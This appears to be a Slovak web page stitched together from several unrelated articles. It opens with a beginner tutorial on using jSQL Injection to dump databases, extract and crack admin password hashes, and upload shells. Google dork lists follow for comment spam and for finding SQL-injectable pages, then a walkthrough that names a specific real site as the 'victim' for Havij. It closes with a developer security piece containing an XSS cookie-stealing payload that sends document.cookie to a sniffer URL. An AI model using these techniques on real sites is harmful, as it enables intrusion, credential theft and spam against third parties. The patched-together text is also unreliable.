Návod na používanie jSQL Injection, multifunkčného nástroja na vyhľadávanie a využívanie SQL injekcií v Kali Linuxe. Návod na používanie jSQL Injection - multifunkčný nástroj na vyhľadávanie a využívanie SQL injekcií v Kali Linuxe

Spustite stiahnutý súbor dvojitým kliknutím (musíte mať virtuálny stroj ).

[Sekcia vo vývoji]

[Sekcia vo vývoji]

[Sekcia vo vývoji]

Práca s programom je mimoriadne jednoduchá. Stačí zadať adresu webovej stránky a stlačiť ENTER.

Nasledujúca snímka obrazovky ukazuje, že stránka je zraniteľná voči trom typom SQL injekcií (informácie o nich sú uvedené v pravom dolnom rohu). Kliknutím na názvy injekcií môžete prepínať použitú metódu:

Taktiež sa nám už zobrazili existujúce databázy.

Obsah každej tabuľky si môžete pozrieť:

Najzaujímavejšou vecou na tabuľkách sú zvyčajne poverenia správcu.

Ak budete mať šťastie a nájdete údaje správcu, je priskoro na radosť. Stále musíte nájsť admin panel, kam zadať tieto údaje.

Ak to chcete urobiť, prejdite na ďalšiu kartu. Tu nás privíta zoznam možných adries. Na kontrolu môžete vybrať jednu alebo viac stránok:

Pohodlie spočíva v tom, že nemusíte používať ďalšie programy.

Bohužiaľ, nie je veľa neopatrných programátorov, ktorí ukladajú heslá v čistom texte. Pomerne často v riadku hesla vidíme niečo ako

8743b52063cd84097a65d1633f5c74f5

Toto je hash. Môžete ho dešifrovať pomocou hrubej sily. A... jSQL Injection má vstavaný brute force.

Nepochybným pohodlím je, že nemusíte hľadať ďalšie programy. Existuje podpora pre mnohé z najpopulárnejších hashov.

Toto nie je najviac najlepšia možnosť. Aby ste sa stali guruom v dekódovaní hashov, odporúča sa kniha „“ v ruštine.

Ale samozrejme, keď nie je po ruke iný program alebo nie je čas na štúdium, veľmi vhod príde jSQL Injection so vstavanou funkciou hrubej sily.

Existujú nastavenia: môžete nastaviť, ktoré znaky sú zahrnuté v hesle, rozsah dĺžky hesla.

Okrem operácií s databázami - ich čítanie a úprava, ak sa zistia injekcie SQL, možno vykonať nasledujúce operácie so súbormi:

• čítanie súborov na serveri
• nahrávanie nových súborov na server
• nahrávanie shellov na server

A to všetko je implementované v jSQL Injection!

Existujú obmedzenia - server SQL musí mať práva na súbory. Tí rozumní správcov systému sú zakázané a majú prístup súborový systém nebude môcť získať.

Prítomnosť privilégií k súborom sa kontroluje pomerne jednoducho. Prejdite na jednu zo záložiek (čítanie súborov, vytvorenie shellu, nahranie nového súboru) a skúste vykonať jednu zo zadaných operácií.

Stále veľmi dôležitá poznámka- potrebujeme vedieť presnú absolútnu cestu k súboru, s ktorým budeme pracovať - ​​inak nebude fungovať nič.

Pozrite si nasledujúcu snímku obrazovky:

Na akýkoľvek pokus o prácu so súborom dostaneme odpoveď: Žiadne privilégium FILE (žiadne privilégiá pre súbor). A tu sa nedá nič robiť.

Ak namiesto toho máte inú chybu:

Problém so zápisom do [názov_adresára]

To znamená, že ste nesprávne zadali absolútnu cestu, kam chcete súbor zapísať.

Aby ste uhádli absolútnu cestu, musíte aspoň vedieť operačný systém na ktorom beží server. Ak to chcete urobiť, prejdite na kartu Sieť.

Tento záznam (riadok Win64) nám dáva dôvod predpokladať, že ide o operačný systém Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Pripojenie: Keep-Alive Metóda: HTTP/1.1 200 OK Obsah-Dĺžka: 353 Dátum: Pia, 11. december 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; znaková sada=UTF-8

Tu máme nejaký Unix (*BSD, Linux):

Transfer-Encoding: chunked Dátum: Pi, 11 Dec 2015 11:57:02 GMT Metóda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Poháňané: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

A tu máme CentOS:

Metóda: HTTP/1.1 200 OK Vyprší: štvrtok, 19. novembra 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Pripojenie: keep-alive X-Cache-Lookup: MISS z t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS z t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Pi, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

V systéme Windows je typický priečinok pre lokality C:\Server\data\htdocs\ . Ale v skutočnosti, ak niekto „uvažoval“ o vytvorení servera v systéme Windows, potom je veľmi pravdepodobné, že táto osoba nepočula nič o privilégiách. Preto by ste mali začať skúšať priamo z adresára C:/Windows/:

Ako vidíte, všetko prebehlo v poriadku na prvýkrát.

Ale samotné shelly jSQL Injection vyvolávajú v mojej mysli pochybnosti. Ak máte privilégiá k súborom, môžete jednoducho niečo nahrať pomocou webového rozhrania.

A dokonca aj táto funkcia je dostupná v jSQL Injection. Všetko je veľmi jednoduché - stiahnite si zoznam stránok (môžete importovať zo súboru), vyberte tie, ktoré chcete skontrolovať, a kliknutím na príslušné tlačidlo spustite operáciu.

jSQL Injection je dobré, mocný nástroj na vyhľadávanie a následné používanie SQL injekcií nájdených na webových stránkach. Jeho nepochybné výhody: jednoduché použitie, vstavané súvisiace funkcie. jSQL Injection môže byť najlepším priateľom začiatočníka pri analýze webových stránok.

Medzi nedostatky by som poznamenal nemožnosť editácie databáz (aspoň ja som túto funkcionalitu nenašiel). Ako všetky nástroje s grafické rozhranie, jednu z nevýhod tohto programu možno pripísať nemožnosti použiť ho v skriptoch. Napriek tomu je v tomto programe možná aj určitá automatizácia - vďaka vstavanej funkcii hromadnej kontroly stránok.

Program jSQL Injection sa používa oveľa pohodlnejšie ako sqlmap. Ale sqlmap podporuje viac typov SQL injekcií, má možnosti pre prácu so súborovými firewallmi a niektoré ďalšie funkcie.

Zrátané a podčiarknuté: jSQL Injection - najlepší priateľ začínajúci hacker.

Pomoc pre tento program v Kali Linux Encyklopédii nájdete na tejto stránke: http://kali.tools/?p=706

Používať to vie asi každý vyhľadávač, ako Google =) Ale nie každý to vie, ak to správne poskladáte vyhľadávací dopyt pomocou špeciálnych dizajnov dosiahnete výsledky toho, čo hľadáte, oveľa efektívnejšie a rýchlejšie =) V tomto článku sa pokúsim ukázať, čo a ako musíte urobiť, aby ste správne hľadali

Google podporuje niekoľko pokročilých operátorov vyhľadávania, ktoré majú špeciálny význam pri vyhľadávaní na google.com. Tieto operátory zvyčajne zmenia vyhľadávanie alebo dokonca prikážu Googlu, aby to urobil úplne rôzne druhy hľadať. Napríklad odkaz: konštrukcia je špeciálny operátor a požiadavka link: www.google.com vám neposkytne normálne vyhľadávanie, ale namiesto toho nájde všetky webové stránky, ktoré majú odkazy na google.com.
alternatívne typy žiadostí

cache: Ak do dopytu zahrniete iné slová, Google zvýrazní tieto zahrnuté slová v dokumente vo vyrovnávacej pamäti.
napr. cache: www.webova stranka zobrazí obsah uložený vo vyrovnávacej pamäti so zvýrazneným slovom „web“.

odkaz: Vyhľadávací dopyt uvedený vyššie zobrazí webové stránky, ktoré obsahujú odkazy na zadaný dopyt.
Napríklad: odkaz: www.stránka zobrazí všetky stránky, ktoré majú odkaz na http://www.site

súvisiace: Zobrazuje webové stránky, ktoré „súvisia“ so zadanou webovou stránkou.
napr. súvisiace: www.google.com zobrazí zoznam webových stránok, ktoré sú podobné domovskej stránke Google.

info: Vyžiadať informácie: zobrazí niektoré informácie, ktoré má Google o webovej stránke, ktorú požadujete.
napr. info: webstránka zobrazí informácie o našom fóre =) (Armada - Fórum pre dospelých webmasterov).

Ďalšie žiadosti o informácie

define: Dotaz define: poskytne definíciu slov, ktoré za ním zadáte, zozbieraných z rôznych online zdrojov. Definícia bude pre celú zadanú frázu (to znamená, že bude zahŕňať všetky slová v presnom dopyte).

akcie: Ak začnete dopyt s akciami: Google spracuje zvyšok dopytových výrazov ako symboly akcií a prepojí sa na stránku zobrazujúcu hotové informácie pre tieto symboly.
napr. akcie: Intel yahoo zobrazí informácie o Intel a Yahoo. (Upozorňujeme, že by ste mali zadať symboly mimoriadnych správ, nie názov spoločnosti)

Modifikátory dopytov

site: Ak do svojho dopytu zahrniete site:, Google obmedzí výsledky na tie webové stránky, ktoré nájde v danej doméne.
Môžete tiež vyhľadávať podľa jednotlivých zón, ako je ru, org, com atď ( site:com site:ru)

allintitle: Ak spustíte dopyt s allintitle:, Google obmedzí výsledky na všetky slová dopytu v názve.
napr. allintitle: vyhľadávanie google vráti všetky stránky Google podľa vyhľadávania, ako sú obrázky, blog atď

intitle: Ak vo svojom dopyte zahrniete intitle:, Google obmedzí výsledky na dokumenty obsahujúce toto slovo v názve.
napr. intitle:Obchod

allinurl: Ak spustíte dopyt s allinurl: Google obmedzí výsledky na všetky slová dopytu v adrese URL.
napr. allinurl: vyhľadávanie Google vráti dokumenty pomocou google a vyhľadávania v názve. Prípadne môžete slová oddeliť lomkou (/), potom sa slová na oboch stranách lomky budú hľadať na tej istej stránke: Príklad allinurl: foo/bar

inurl: Ak vo svojom dopyte zahrniete inurl:, Google obmedzí výsledky na dokumenty obsahujúce toto slovo v adrese URL.
napr. Animácia inurl:site

intext: hľadá len zadané slovo v texte stránky, ignoruje nadpisy a texty odkazov a ďalšie veci, ktoré s tým nesúvisia. Existuje aj derivát tohto modifikátora - allintext: t.j. ďalej sa všetky slová v dopyte budú hľadať iba v texte, čo môže byť tiež dôležité, ignorujúc často používané slová v odkazoch
napr. intext:forum

daterange: vyhľadávanie v rámci časového rámca (daterange:2452389-2452389), dátumy pre časy sú v juliánskom formáte.

No a všetky druhy zaujímavých príkladov dotazov

Príklady písania dopytov pre Google. Pre spamerov

Inurl:control.guest?a=sign

Site:books.dreambook.com „Adresa URL domovskej stránky“ „Podpísať“ inurl:sign

Stránka: www.freegb.net Domovská stránka

Inurl:sign.asp “Počet znakov”

“Správa:” inurl:sign.cfm “Odosielateľ:”

Inurl:register.php „Registrácia používateľa“ „Webová stránka“

Inurl:edu/kniha návštev “Zapíšte sa do knihy návštev”

Inurl:post “Uverejniť komentár” “URL”

Inurl:/archives/ “Komentáre:” “Pamätať si info?”

“Scenár a knihu návštev vytvoril:” “URL:” “Komentáre:”

Inurl:?action=add “phpBook” “URL”

Intitle: "Odoslať nový príbeh"

Časopisy

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Kniha návštev"

Blogy

Inurl:blogger.com/comment.g?”postID””anonymné”

Inurl:typepad.com/ “Pridať komentár” “Pamätať si osobné informácie?”

Inurl:greatestjournal.com/community/ “Uverejniť komentár” “adresy anonymných plagátov”

"Uverejniť komentár" "adresy anonymných plagátov" -

Intitle: "Uverejniť komentár"

Inurl:pirillo.com “Pridať komentár”

fóra

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?“

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transscript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

tu je malý zoznam. Môžete použiť svoje. A tak sme našli stránku. Napríklad http://www.vestitambov.ru/
Ďalej si stiahnite tento program

Kliknite na tlačidlo OK. Potom vložíme miesto obete.
Stlačíme štart. Ďalej čakáme na výsledky.
A tak program našiel zraniteľnosť SQL.

Ďalej si stiahnite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= vložte tam prijatý odkaz. Nebudem vysvetľovať, ako používať Havij a kde ho stiahnuť; Všetky. Dostali ste údaje, ktoré potrebujete – heslo správcu, a potom je to už len na vašej fantázii.

P.S. Toto je môj prvý pokus niečo napísať. Ospravedlňujeme sa, ak niečo nie je v poriadku

Rozhodol som sa trochu porozprávať informačnej bezpečnosti. Článok bude užitočný pre začínajúcich programátorov a tých, ktorí sa práve začali zaoberať vývojom Frontendu. v čom je problém?

Mnoho začínajúcich vývojárov sa tak nechá uniesť písaním kódu, že úplne zabudne na bezpečnosť svojej práce. A čo je najdôležitejšie, zabúdajú na také zraniteľnosti, akými sú SQL a XXS dotazy. Tiež prichádzajú s jednoduchými heslami pre svoje administratívne panely a sú vystavené hrubej sile. Aké sú tieto útoky a ako sa im môžete vyhnúť?

SQL injection je najbežnejší typ útoku na databázu, ktorý sa vykonáva počas dotazu SQL pre konkrétny DBMS. Takýmito útokmi trpí mnoho ľudí a dokonca aj veľké spoločnosti. Dôvodom je chyba vývojára pri písaní databázy a striktne povedané SQL dotazov.

Útok SQL injection je možný z dôvodu nesprávneho spracovania vstupných údajov použitých v SQL dotazoch. Ak je útok hackera úspešný, riskujete stratu nielen obsahu vašich databáz, ale aj hesiel a protokolov administratívneho panela. A tieto údaje budú stačiť na úplné ovládnutie stránky alebo na jej nezvratné úpravy.

Útok je možné úspešne reprodukovať v skriptoch napísaných v PHP, ASP, Perl a ďalších jazykoch. Úspešnosť takýchto útokov závisí viac od toho, aký DBMS sa používa a ako je implementovaný samotný skript. Na svete existuje veľa zraniteľných stránok pre SQL injekcie. Dá sa to ľahko overiť. Stačí zadať „dorks“ - to sú špeciálne dopyty na vyhľadávanie zraniteľných stránok. Tu sú niektoré z nich:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Ako ich používať? Stačí ich zadať do vyhľadávača Google alebo Yandex. Vyhľadávač vám poskytne nielen zraniteľnú stránku, ale aj stránku o tejto zraniteľnosti. Tým sa však nezastavíme a uistíme sa, že stránka je skutočne zraniteľná. Na to stačí zadať za hodnotu „id=1“ jediný citát"'". Niečo takéto:

• inurl:games.php?id=1'

A stránka nám zobrazí chybu o SQL dotaz. Čo náš hacker potrebuje ďalej?

A potom potrebuje práve tento odkaz na chybovú stránku. Potom práca na zraniteľnosti vo väčšine prípadov prebieha v distribúcii "Kali linux" s jej nástrojmi pre túto časť: zavedenie injekčného kódu a vykonanie potrebných operácií. Ako sa to stane, vám nemôžem povedať. Informácie o tom však nájdete na internete.

Tento typ útoku sa vykonáva na Cookies. Používatelia ich zase radi ukladajú. prečo nie? Čo by sme bez nich robili? Koniec koncov, vďaka súborom cookie nemusíme stokrát zadávať heslo pre Vk.com alebo Mail.ru. A je málo tých, ktorí ich odmietajú. Na internete sa však pre hackerov často objavuje pravidlo: koeficient pohodlnosti je priamo úmerný koeficientu neistoty.

Na implementáciu XSS útoku potrebuje náš hacker znalosť JavaScriptu. Jazyk je na prvý pohľad veľmi jednoduchý a neškodný, pretože nemá prístup k počítačovým zdrojom. Hacker môže pracovať iba s JavaScriptom v prehliadači, ale to stačí. Koniec koncov, hlavnou vecou je zadať kód na webovú stránku.

Nebudem podrobne hovoriť o procese útoku. Poviem vám len základy a význam toho, ako sa to deje.

Hacker môže pridať kód JS do nejakého fóra alebo knihy návštev:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skripty nás presmerujú na infikovanú stránku, kde sa vykoná kód: či už je to sniffer, nejaký druh úložiska alebo exploit, ktorý nejakým spôsobom ukradne naše cookies z vyrovnávacej pamäte.

Prečo JavaScript? Pretože JavaScript je skvelý pri spracovávaní webových požiadaviek a má prístup k súborom cookie. Ak nás ale náš skript zavedie na nejakú stránku, používateľ si to ľahko všimne. Tu hacker využíva prefíkanejšiu možnosť – jednoducho zadá kód do obrázka.

Img=nový obrázok();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Jednoducho vytvoríme obrázok a priradíme mu náš skript ako adresu.

Ako sa pred tým všetkým chrániť? Je to veľmi jednoduché - neklikajte na podozrivé odkazy.

DoS (z anglického Denial of Service - odmietnutie služby) - hackerský útok na počítačový systém aby ju priviedol k neúspechu. Ide o vytvorenie podmienok, za ktorých bona fide používatelia systému nemajú prístup k poskytovanému systémové prostriedky(servery), alebo je tento prístup zložitý. Zlyhanie systému môže byť tiež krokom k jeho prevzatiu, ak softvér v núdzovej situácii vytvorí kritické informácie: napríklad verziu, časť programový kód Ale najčastejšie je to miera ekonomického tlaku: strata jednoduchej služby, ktorá generuje príjem. Účty od poskytovateľa alebo opatrenia na zabránenie útoku výrazne zasiahli „cieľ“ vo vrecku V súčasnosti sú najpopulárnejšie útoky DoS a DDoS, pretože umožňujú zlyhať takmer akýkoľvek systém bez zanechania právne významného dôkazu.

Aký je rozdiel medzi útokom DoS a DDos?

DoS je útok navrhnutý premysleným spôsobom. Napríklad, ak server nekontroluje správnosť prichádzajúcich paketov, hacker môže zadať požiadavku, ktorej spracovanie bude trvať večnosť a nebude dostatok času procesora na prácu s inými pripojeniami. V súlade s tým bude klientom odmietnutá služba. Týmto spôsobom však nebude možné preťažiť alebo zakázať veľké známe stránky. Sú vyzbrojené pomerne širokými kanálmi a super výkonnými servermi, ktoré sa s takýmto preťažením bez problémov vyrovnajú.

DDoS je vlastne rovnaký útok ako DoS. Ale ak v DoS existuje jeden paket požiadaviek, potom v DDoS ich môžu byť stovky alebo viac. Dokonca aj supervýkonné servery nemusia byť schopné zvládnuť takéto preťaženie. Uvediem príklad.

DoS útok je, keď s niekým vediete rozhovor, ale potom príde nejaký nevychovaný človek a začne nahlas kričať. Je buď nemožné, alebo veľmi ťažké hovoriť. Riešenie: zavolajte ochranku, ktorá osobu upokojí a vyvedie z priestorov. DDoS útoky sú, keď sa dnu vrúti dav tisícov takýchto nevychovaných ľudí. V tomto prípade ochranka nebude môcť všetkých zviazať a odviesť.

DoS a DDoS sa vykonávajú z počítačov, takzvaných zombie. Ide o počítače používateľov napadnutých hackermi, ktorí ani len netušia, že ich počítač sa zúčastňuje útoku na akýkoľvek server.

Ako sa pred tým chrániť? Vo všeobecnosti v žiadnom prípade. Hackerovi však môžete veci skomplikovať. Ak to chcete urobiť, musíte si vybrať dobrý hosting s výkonnými servermi.

Vývojár môže prísť s množstvom systémov na ochranu pred útokmi, plne si prezrieť skripty, ktoré sme napísali, skontrolovať, či stránka neobsahuje zraniteľné miesta atď. Ale keď príde na to posledný krok rozloženie stránky, totiž keď si na admin panel jednoducho zadá heslo, môže zabudnúť na jednu vec. Heslo!

Dôrazne sa neodporúča nastaviť jednoduché heslo. Môže to byť 12345, 1114457, vasya111 atď. Neodporúča sa nastavovať heslá kratšie ako 10-11 znakov. V opačnom prípade môžete byť vystavení najčastejšiemu a nekomplikovanému útoku – Brute force.

Brute force je slovníkový útok pomocou hesla špeciálne programy. Slovníky môžu byť rôzne: latinské, vyčíslenie podľa čísel, povedzme do určitého rozsahu, zmiešané (latinka + čísla) a dokonca existujú slovníky s jedinečnými znakmi @#4$%&*~~`’”\ ? atď.

Samozrejme, tomuto typu útoku sa dá ľahko vyhnúť. Stačí si vymyslieť zložité heslo. Dokonca aj captcha vás môže zachrániť. Tiež, ak je vaša stránka vytvorená na CMS, veľa z nich zistí tento typ útoku a zablokuje IP. Vždy si musíte pamätať, že čím viac rôznych znakov je v hesle, tým ťažšie je uhádnuť.

Ako fungujú hackeri? Vo väčšine prípadov buď podozrievajú alebo poznajú časť hesla vopred. Je celkom logické predpokladať, že heslo používateľa určite nebude pozostávať z 3 alebo 5 znakov. Takéto heslá vedú k častému hackovaniu. V zásade hackeri berú rozsah 5 až 10 znakov a pridávajú niekoľko znakov, ktoré môžu vopred poznať. Ďalej sa vygenerujú heslá s požadovanými rozsahmi. Linuxová distribúcia Kali má dokonca programy pre takéto prípady. A voilá, útok už nebude trvať dlho, keďže objem slovníka už nie je taký veľký. Okrem toho môže hacker využiť silu grafickej karty. Niektoré z nich podporujú systém CUDA a rýchlosť vyhľadávania sa zvyšuje až 10-krát. A teraz vidíme, že útok je takýto jednoduchým spôsobom celkom reálne. Nie sú to však len webové stránky, ktoré sú vystavené hrubej sile.

Vážení vývojári, nikdy nezabúdajte na systém informačnej bezpečnosti, pretože dnes veľa ľudí, vrátane štátov, trpí takýmito typmi útokov. Najväčšou zraniteľnosťou je predsa človek, ktorý sa môže vždy niekde rozptýliť alebo niečo prehliadnuť. Sme programátori, ale nie naprogramované stroje. Buďte vždy na pozore, pretože strata informácií môže mať vážne následky!